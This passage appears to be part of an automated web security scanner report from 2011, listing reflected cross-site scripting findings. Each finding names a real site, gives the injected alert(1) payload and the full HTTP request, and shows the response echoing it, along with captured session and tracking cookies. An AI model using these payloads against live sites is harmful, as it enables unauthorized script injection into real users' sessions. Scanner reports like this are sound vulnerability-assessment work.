Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<a href="http://en.gravatar.com/sitef83a0"><a>822417fb1b/login/%252F.json">
...[SNIP]...
3.23. http://en.gravatar.com/site/login/%252F [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a34"><a>f3a3ad4ddd1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /site/login/%252F44a34"><a>f3a3ad4ddd1 HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:34:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:34:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 6358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<form method="post" action="/sessions/44a34"><a>f3a3ad4ddd1">
...[SNIP]...
3.24. http://intensedebate.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ed5a1'><script>alert(1)</script>0497f372f83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ed5a1'><script>alert(1)</script>0497f372f83=1 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 18492

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/?ed5a1'><script>alert(1)</script>0497f372f83=1'>
...[SNIP]...
3.25. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b436c<script>alert(1)</script>1dbb46b674e was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07608b436c<script>alert(1)</script>1dbb46b674e HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=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; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 14 Jun 2011 00:13:59 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 15 Jun 2011 00:13:59 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:59 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07608B436C<SCRIPT>ALERT(1)</SCRIPT>1DBB46B674E" was not recognized.
*/
3.26. http://members.pega.com/cookiecheck.asp [pcd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /cookiecheck.asp

Issue detail

The value of the pcd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36122"%3balert(1)//fab585167f2 was submitted in the pcd parameter. This input was echoed as 36122";alert(1)//fab585167f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiecheck.asp?pcd=/login.asp36122"%3balert(1)//fab585167f2 HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:28:06 GMT
Date: Tue, 14 Jun 2011 12:29:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 31648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/
...[SNIP]...
test_cookie') == 'cookie_value') {
       // cookie worked
       $.cookie('nocheck', '1', { expires: 180, path: '/', domain: 'pega.com', secure: false });
       //redirect to destination
       var dst = "/login.asp36122";alert(1)//fab585167f2";
       if (dst == '') {
           dst = "/login.asp";    
       }
       if (dst != 'bad'){
           document.location = dst;
       }
   } else {
       // cookie failed
       alert("To sign in to pega.com, you must have cookies enabl
...[SNIP]...
3.27. http://members.pega.com/login.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /login.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeb55"%3balert(1)//5f8752a598e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eeb55";alert(1)//5f8752a598e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login.asp?eeb55"%3balert(1)//5f8752a598e=1 HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB; __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.8.10.1308054477; __utmz=87550468.1308054615.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87550468.1252779431.1308054615.1308054615.1308054615.1; __utmc=87550468; __utmb=87550468.1.10.1308054615; test_cookie=cookie_value; nocheck=1

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:36:11 GMT
Date: Tue, 14 Jun 2011 12:37:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Set-Cookie: pega%5Fautolog=000; expires=Wed, 13-Jun-2012 04:00:00 GMT; path=/
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 35643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
true;
   finished &= emailComplete(e.email_address.value);
   finished &= passwordCheck(e.password_display.value);
   return finished;
}

function tryToRegister(){
   e.login_form.action="register.asp?eeb55";alert(1)//5f8752a598e=1&";
   e.submitted.value = "1";
   //hide("password_display");
   e.password.value = lemon(e.password_display.value);
   e.password_display.value = "";
   e.login_form.onsubmit = null;
   e.login_form.subm
...[SNIP]...
3.28. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /63975/17983acd3149cc7b59eebf3385392137

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 925bf<script>alert(1)</script>2fdbf40cf8d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

